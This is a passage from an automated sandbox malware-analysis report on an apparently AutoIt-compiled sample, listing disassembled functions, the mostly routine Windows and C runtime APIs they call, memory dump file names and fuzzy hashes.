Instruction ID: 2376af22503a660e649b2dee5a1a5595c1a660fb0506ecf6e7dd8b8c5301846b
Opcode Fuzzy Hash: 70385ed728717044e6c00d5679beb2a5f5ae60de3c76a913e773fae2f89f93fe
Instruction Fuzzy Hash: A6018871C00604EBCF12AF758D01F9E7B71BF40360F16821DF8145A161DB358A91EB91

Function 00AC55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00AC8D68: __getptd_noexit.LIBCMT ref: 00AC8D68

__lock_file.LIBCMT ref: 00AC561B

Part of subcall function 00AC6E4E: __lock.LIBCMT ref: 00AC6E71

__fclose_nolock.LIBCMT ref: 00AC5626

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 7b23a556f07154ec0cdde574b7ef007ffbd2665b59541c77e42247c4fa49f46a
Instruction ID: 557871a5ca3449ba1ad8167dae19964375df485c7c8d6890cf1839c2aa9817b2
Opcode Fuzzy Hash: 7b23a556f07154ec0cdde574b7ef007ffbd2665b59541c77e42247c4fa49f46a
Instruction Fuzzy Hash: 4BF09071C00A049ADB21AB758A02F6E66E16F80734F5B824DF415AB1C1CF7CAD819B59

Function 00AA81C1 Relevance: 2.6, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00AA558F,?,?,?,?,?), ref: 00AA81DA
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00AA558F,?,?,?,?,?), ref: 00AA820D

Part of subcall function 00AA78AD: _memmove.LIBCMT ref: 00AA78E9

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: e6c1f86f7861c89bc3d82d486d7e2afd0167340d442071c43d0675616297c2df
Instruction ID: 56ec7c8476be1aae8f2dcbb522fcfdb454fd4b186ea1cf56e814af6ecce830af
Opcode Fuzzy Hash: e6c1f86f7861c89bc3d82d486d7e2afd0167340d442071c43d0675616297c2df
Instruction Fuzzy Hash: C901AD35201104BFEB246B25DE4AF7B3B6CEB8A760F10803AFD05DE1D1EE3098408671

Function 00AB2123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bfb57b3d0a0a8e2c0c35f59624a1e63935480550f9f07f4f11fdd11a02a03b5
Instruction ID: 26d51caa4accec56dd91ea1e656f9fe757a0345d5c6a525d9637c1914e8bac0e
Opcode Fuzzy Hash: 4bfb57b3d0a0a8e2c0c35f59624a1e63935480550f9f07f4f11fdd11a02a03b5
Instruction Fuzzy Hash: A1516E35B00604AFCF14EB68CA95FAE77B5AF46350F148569F906AB392CB30ED00CB55

Function 00AA766F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AA774A

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: ab6fd76627a5ae7c550f538024095d9708897891a7e1bc3d2fbdd679136dc1ef
Instruction ID: d6620a35f55571b11d5bd7662e9d01a7458d2760efb05f6de14a410cbb41997f
Opcode Fuzzy Hash: ab6fd76627a5ae7c550f538024095d9708897891a7e1bc3d2fbdd679136dc1ef
Instruction Fuzzy Hash: B1317079608A02DFC7259F19C990E2BF7E4FF0A310715C56DE98A8B7A5E730D881CB94

Function 00AA5C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00AA5CF6

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0f072f5b1af0b284e34205a1a1705c133264c77e11d6438aff26c726d4192636
Instruction ID: a7c9b847a09701869269036cb1e58fa2061590aa6d743ebed9c37c1e146b3c9f
Opcode Fuzzy Hash: 0f072f5b1af0b284e34205a1a1705c133264c77e11d6438aff26c726d4192636
Instruction Fuzzy Hash: 2A316C31E00B09AFCB18DF2DC484A6DB7B1FF49320F14862AE81993754D731B960DB94

Function 00AE00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00AE00E1

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 2503a388df112b7d8305610ca0f288c7f7f385f47fcdd8c0681fcd84767a5b3d
Instruction ID: a440efc191067b6b5a40983709082fd4a8986912949580997ea64cd7a08a72b4
Opcode Fuzzy Hash: 2503a388df112b7d8305610ca0f288c7f7f385f47fcdd8c0681fcd84767a5b3d
Instruction Fuzzy Hash: 8A410674604351DFDB24DF14C584B1ABBE0BF46318F1989ACE8994B3A2C772EC85CB52

Function 00AA4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA4D13: FreeLibrary.KERNEL32(00000000,?), ref: 00AA4D4D

Part of subcall function 00AC548B: __wfsopen.LIBCMT ref: 00AC5496

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00B662F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AA4F6F

Part of subcall function 00AA4CC8: FreeLibrary.KERNEL32(00000000), ref: 00AA4D02

Part of subcall function 00AA4DD0: _memmove.LIBCMT ref: 00AA4E1A

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 430193ce3620254612bba562708c016a78dd5b4982b9b1f7e811790da866ac29
Instruction ID: ecd33b39168df782f42cb1ae05b7729bc2a5b902a0de19abeb4473a27b256128
Opcode Fuzzy Hash: 430193ce3620254612bba562708c016a78dd5b4982b9b1f7e811790da866ac29
Instruction Fuzzy Hash: BE11E731A00705AECF14AF70DD02F6E77A59F89B10F10843AF541A72C1DFB19A059B50

Function 00AE01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00AE01BB

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 736bc69e2578ca03fe82de79e1fbafb23e8e4c5e4ec28c7b4f382b096b144bce
Instruction ID: 74128d9d6d186c91b87c9326ca80c4fcbf3e04ae5d679a776e34bf8c44e4252e
Opcode Fuzzy Hash: 736bc69e2578ca03fe82de79e1fbafb23e8e4c5e4ec28c7b4f382b096b144bce
Instruction Fuzzy Hash: 9C21EFB4608351DFCB24DF54C984B1ABBE0BF8A304F05896CE99A577A2D731E845CB62

Function 00AA5D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00AA5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00AA5D76

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 48330eba1879557f305aa8893518471cccebaa1fe2222a732135c33124a9664d
Instruction ID: bbd86307fd73e78508de7e1018aacb37a4b1a7ea17dde2a755561b210d17ea36
Opcode Fuzzy Hash: 48330eba1879557f305aa8893518471cccebaa1fe2222a732135c33124a9664d
Instruction Fuzzy Hash: 73113631600B019FD330CF25C888B66B7F9EF46760F10C92EE5AA87A90D7B1E945CB64

Function 00AA7F41 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AA7F82

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: c56c3b4cee92743fd843ba2fcf40f434112ab0d27706c117a31bb8eb393c03f0
Instruction ID: 24be28a47391d0a88afd7d2b783ca7145b9d9270f31d0d0df8365d1d87f2c897
Opcode Fuzzy Hash: c56c3b4cee92743fd843ba2fcf40f434112ab0d27706c117a31bb8eb393c03f0
Instruction Fuzzy Hash: 7701D672204701AED7205B38CC02F6BBBA8EB45760F11852EF55ACB1D1EB31E540C790

Function 00AC4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00AC4AD6

Part of subcall function 00AC8D68: __getptd_noexit.LIBCMT ref: 00AC8D68

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 4413b42b802e405e86678f44f083e9256c86e75df05c3c49aa3c35c81ae5240e
Instruction ID: 0564418430937bd52c00b3d3991f7a3dd7ddc67947fcbb10f6690cb3dd8c0b0d
Opcode Fuzzy Hash: 4413b42b802e405e86678f44f083e9256c86e75df05c3c49aa3c35c81ae5240e
Instruction Fuzzy Hash: C9F0FF31800208ABDF61AF648D02FAE36A0BF04365F06850CF824AA1D1CB788E50CF48

Function 00AA4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00B662F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AA4FDE

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: c4a68192122ad1dd3941c4a6cd51326ff692317259fc398365bd7d6bced4b36c
Instruction ID: 97686e3b04985acc752a2fe822deef66e1c65bda0720f7448c874e912e6cc007
Opcode Fuzzy Hash: c4a68192122ad1dd3941c4a6cd51326ff692317259fc398365bd7d6bced4b36c
Instruction Fuzzy Hash: 85F03071505B12CFC7349F64D49481ABBF1BF4972A3209A3EF1D683650C7B1A850DF40

Function 00AC09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AC09F4

Part of subcall function 00AA7D2C: _memmove.LIBCMT ref: 00AA7D66

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: d594a4bfe67177c1313ce2fb7cdb9b000e3c12d7da64da5d13a9e2646e0ab840
Instruction ID: c4aa5743bd7bcaa9eb6936b41f28e1878e74b8f638c2f9c98e575b2d57d801fb
Opcode Fuzzy Hash: d594a4bfe67177c1313ce2fb7cdb9b000e3c12d7da64da5d13a9e2646e0ab840
Instruction Fuzzy Hash: 62E0863690422857C720D6989C05FFA77ADDF89690F0401B6FC4CD7244E9609C818690

Function 00B09129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00B0914B

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction ID: cb2f83f74651949eed5b7cd9b430d568c45215397ba89e7469d559c55ca9e648
Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction Fuzzy Hash: 94E092B0604B009FD7348A24D810BE377E0FB06315F00095CF29A93342EB6278418759

Function 00AA5DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00ADE16B,?,?,00000000), ref: 00AA5DBF

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 12af93d967a2bcda26257adc005398f240b84385a6b7ec0ee24fb13d4f90e154
Instruction ID: 0c05caf6297b6058a01ffd274c091064143dcf16b13baed78d2784198d89bedb
Opcode Fuzzy Hash: 12af93d967a2bcda26257adc005398f240b84385a6b7ec0ee24fb13d4f90e154
Instruction Fuzzy Hash: D6D0C77464020CBFE710DB80DC46FA9777CD705711F500194FD0467290D6B27D508795

Function 00AC548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00AC5496

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 1cc97aaed509a281c0cd8bddafe48d6923b927f2d741121ebaabec8e546ef707
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 4FB0927684020C77DE012E92ED02F593B1A9B40679F808020FB0C28162A673E6E09689

Function 00B0D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 00B0D46A

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: d00c9ad3a31ee7440a68711139ccaeb576d207934f64f19370ebeb86e7216f4f
Instruction ID: fb934d1f135f5ef594a02115cfbd5db7a0253366763db36c5a8837dbae2f9eb1
Opcode Fuzzy Hash: d00c9ad3a31ee7440a68711139ccaeb576d207934f64f19370ebeb86e7216f4f
Instruction Fuzzy Hash: 98714E346043018FC714EF64C991A6EBBE4EF89354F04496DF8969B2E2DB30E949CB56

Function 00AC0E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00AC0EF7

Memory Dump Source

